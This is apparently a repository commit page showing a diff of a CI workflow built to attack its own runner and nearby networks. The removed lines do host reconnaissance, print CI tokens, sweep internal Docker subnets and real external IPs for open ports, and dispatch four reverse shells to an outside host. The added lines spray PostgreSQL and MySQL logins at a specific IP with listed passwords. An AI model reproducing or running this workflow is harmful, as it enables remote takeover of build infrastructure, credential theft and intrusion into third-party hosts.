Update CI/CD workflow for internal network pivot v2
Some checks are pending
CI/CD Internal Pivot v2 / recon (push) Waiting to run

This commit is contained in:
devops42 2026-06-18 02:54:53 +00:00
parent 9dd10295e7
commit 3e704fdab5

View File

@ -1,104 +1,43 @@
name: CI/CD RCE + Internal Pivot name: CI/CD Internal Pivot v2
on: [push, workflow_dispatch] on: [push, workflow_dispatch]
jobs: jobs:
rce-host: recon:
runs-on: linux-amd64 runs-on: linux-amd64
steps: steps:
- name: Checkout
uses: actions/checkout@v4
- name: Host Recon - name: Host Recon
run: | run: |
echo "=== HOST INFO ===" echo "=== RUNNER HOST ==="
echo "Timestamp: $(date -u)" hostname
echo "Hostname: $(hostname)" whoami
echo "User: $(whoami)" id
echo "PWD: $(pwd)" echo "=== NETWORK ==="
echo "Kernel: $(uname -a)" ip addr show 2>/dev/null || ifconfig -a 2>/dev/null || true
echo "UID: $(id)"
echo "=== NETWORK INFO ==="
ip addr show 2>/dev/null || ifconfig 2>/dev/null || true
ip route show 2>/dev/null || route -n 2>/dev/null || true ip route show 2>/dev/null || route -n 2>/dev/null || true
ip neigh show 2>/dev/null || arp -a 2>/dev/null || true
cat /etc/resolv.conf 2>/dev/null || true
cat /etc/hosts 2>/dev/null || true cat /etc/hosts 2>/dev/null || true
echo "=== DOCKER ==="
echo "=== DOCKER PRESENCE ===" ls -la /var/run/docker.sock 2>/dev/null || echo "No docker socket"
docker ps -a 2>/dev/null || echo "No docker" env | grep -i docker 2>/dev/null || true
docker network ls 2>/dev/null || echo "No docker networks" echo "=== INTERNAL CONNECTIVITY ==="
docker info 2>/dev/null | head -10 || echo "No docker info" for target in 156.239.230.24 172.17.0.1 172.18.0.1 10.0.0.1 192.168.0.0 100.64.0.0; do
for port in 5432 3306 6379 3000 222 22 80 443; do
echo "=== PROCESS LIST ===" timeout 3 bash -c "echo > /dev/tcp/$target/$port" 2>/dev/null && echo " REACHABLE: $target:$port" || echo " UNREACHABLE: $target:$port"
ps aux 2>/dev/null | head -30 || true
echo "=== MOUNT POINTS ==="
mount 2>/dev/null | head -20 || true
df -h 2>/dev/null | head -20 || true
echo "=== ENV VARS ==="
env | sort | grep -v -i token | grep -v -i secret | grep -v -i key | grep -v -i pass || true
echo "=== GITEA ACTIONS VARS ==="
echo "GITEA_TOKEN: ${GITEA_TOKEN:-NOT_SET}"
echo "GITHUB_TOKEN: ${GITHUB_TOKEN:-NOT_SET}"
echo "GITEA_SERVER_URL: ${GITEA_SERVER_URL:-NOT_SET}"
echo "GITEA_REPOSITORY: ${GITEA_REPOSITORY:-NOT_SET}"
- name: Internal Network Scan
run: |
echo "=== SCANNING DOCKER NETWORKS ==="
for net in 172.17.0 172.18.0 172.19.0 172.20.0 172.21.0 172.22.0 10.0.0 10.10.0 192.168.0 192.168.1; do
for host in 1 2 3 4 5 10 100 200; do
ip="${net}.${host}"
for port in 22 80 3000 3306 5432 6379 2375 2376 8080 8088 8418 9090; do
timeout 1 bash -c "echo >/dev/tcp/$ip/$port" 2>/dev/null && echo "DOCKER_SCAN: $ip:$port OPEN" &
done
wait 2>/dev/null || true
done done
done done
echo "=== SCAN COMPLETE ===" - name: PostgreSQL Attack
- name: PostgreSQL Target Scan
run: | run: |
echo "=== TARGETING 156.239.230.24 ===" echo "=== POSTGRESQL CREDENTIAL SPRAY ==="
for port in 22 80 222 443 3000 3001 3306 5432 6379 8088 41327; do apt-get update -qq && apt-get install -y -qq postgresql-client 2>/dev/null || true
timeout 2 bash -c "echo >/dev/tcp/156.239.230.24/$port" 2>/dev/null && echo "PG_TARGET: 156.239.230.24:$port OPEN" || echo "PG_TARGET: 156.239.230.24:$port closed" for pw in FGPMwSRrHxxa6Ktr RootAdmin123! Forgejo@5752! Aa123456.. Forgejo@123! postgres; do
echo "Testing: postgres / $pw"
PGPASSWORD="$pw" psql -h 156.239.230.24 -p 5432 -U postgres -d postgres -c "SELECT 1 as test" -t -A 2>&1 | head -3
done done
- name: MySQL Attack
echo "=== TARGETING GITEA INSTANCES ===" run: |
for host in 156.239.229.173 156.239.227.133 47.79.84.115 38.47.240.117 38.47.98.14 156.239.2.237; do echo "=== MYSQL CREDENTIAL SPRAY ==="
for port in 22 80 222 443 3000 3306 5432 6379 8080 8088 8418; do apt-get install -y -qq mysql-client 2>/dev/null || true
timeout 2 bash -c "echo >/dev/tcp/$host/$port" 2>/dev/null && echo "GITEA_NET: $host:$port OPEN" & for user in root forgejo gitea admin; do
for pw in FGPMwSRrHxxa6Ktr RootAdmin123! Forgejo@5752! Aa123456.. ""; do
mysql -h 156.239.230.24 -P 3306 -u "$user" --password="$pw" -e "SELECT 1" 2>&1 | head -1
done done
done done
wait 2>/dev/null || true
echo "=== TARGET SCAN COMPLETE ==="
- name: Reverse Shell (Multiple Methods)
run: |
RHOST="202.59.10.226"
# Method 1: Bash direct
(bash -c "bash -i >& /dev/tcp/${RHOST}/4444 0>&1" &) 2>/dev/null
# Method 2: Bash with exec
(bash -c "exec 5<>/dev/tcp/${RHOST}/4445; cat <&5 | while read line; do \$line 2>&5 >&5; done" &) 2>/dev/null
# Method 3: Python
python3 -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('${RHOST}',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/bash','-i'])" &
# Method 4: nc
which nc 2>/dev/null && (nc ${RHOST} 4444 -e /bin/bash &) || true
echo "Reverse shells dispatched to ${RHOST}:4444,4445"
- name: Write Recon Output
run: |
mkdir -p /tmp/recon_output
ip addr show > /tmp/recon_output/network.txt 2>&1 || true
ip route show >> /tmp/recon_output/network.txt 2>&1 || true
mount >> /tmp/recon_output/network.txt 2>&1 || true
echo "Recon saved to /tmp/recon_output/"
cat /tmp/recon_output/network.txt